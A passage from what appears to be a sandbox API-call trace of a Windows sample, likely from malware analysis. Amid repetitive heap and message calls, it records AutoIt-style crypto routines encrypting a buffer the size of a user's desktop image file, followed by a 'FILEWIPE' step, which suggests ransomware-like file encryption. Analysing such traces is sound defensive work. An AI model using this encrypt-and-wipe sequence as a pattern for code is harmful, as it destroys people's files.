wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.938] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.938] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b7388*, pdwDataLen=0x6ae220*=0x173c2, dwBufLen=0x173d0 | out: pbData=0x8b7388*, pdwDataLen=0x6ae220*=0x173d0) returned 1 [0031.939] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.939] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0031.955] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.955] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.955] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.955] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.955] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0031.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.955] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.956] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.956] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.956] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.956] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.956] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.956] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.956] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.956] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0031.956] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.963] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.963] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.963] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.966] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.966] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.966] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0031.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.966] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.967] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.967] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0031.967] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.967] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0031.967] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.967] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.967] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0031.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.967] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.967] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.967] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0031.967] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0031.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0031.967] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.967] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.968] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0031.968] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0031.968] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.968] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.968] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.968] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.968] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0031.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.968] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.968] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.968] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.968] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.968] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.968] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0031.968] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0031.968] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.968] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0031.969] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.969] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0031.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0031.969] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.969] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.969] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0031.969] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.969] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.969] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.969] FreeLibrary (hLibModule=0x754b0000) returned 1 [0031.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0031.969] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0031.969] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0031.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.969] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.969] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.969] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.970] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.970] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0031.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0031.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.970] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.970] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.970] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad8cedd0, ftCreationTime.dwHighDateTime=0x1d5bdcc, ftLastAccessTime.dwLowDateTime=0x479a5890, ftLastAccessTime.dwHighDateTime=0x1d5b689, ftLastWriteTime.dwLowDateTime=0x479a5890, ftLastWriteTime.dwHighDateTime=0x1d5b689, nFileSizeHigh=0x0, nFileSizeLow=0x173c2, dwReserved0=0x0, dwReserved1=0x777648, cFileName="v6hoz9YcOP.gif", cAlternateFileName="V6HOZ9~1.GIF")) returned 0x7c2100 [0031.970] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0031.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0031.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0031.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.970] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.970] CharLowerBuffW (in: lpsz="byte[95170]", cchLength=0xb | out: lpsz="byte[95170]") returned 0xb [0031.971] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.971] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0031.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.971] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.971] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0031.971] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0031.971] FreeLibrary (hLibModule=0x76b40000) returned 1 [0031.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0031.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.972] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.972] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.972] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.972] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0031.972] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.972] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.972] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.972] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.973] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.973] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.973] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.973] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.973] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.973] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.973] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.973] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.973] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.973] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, 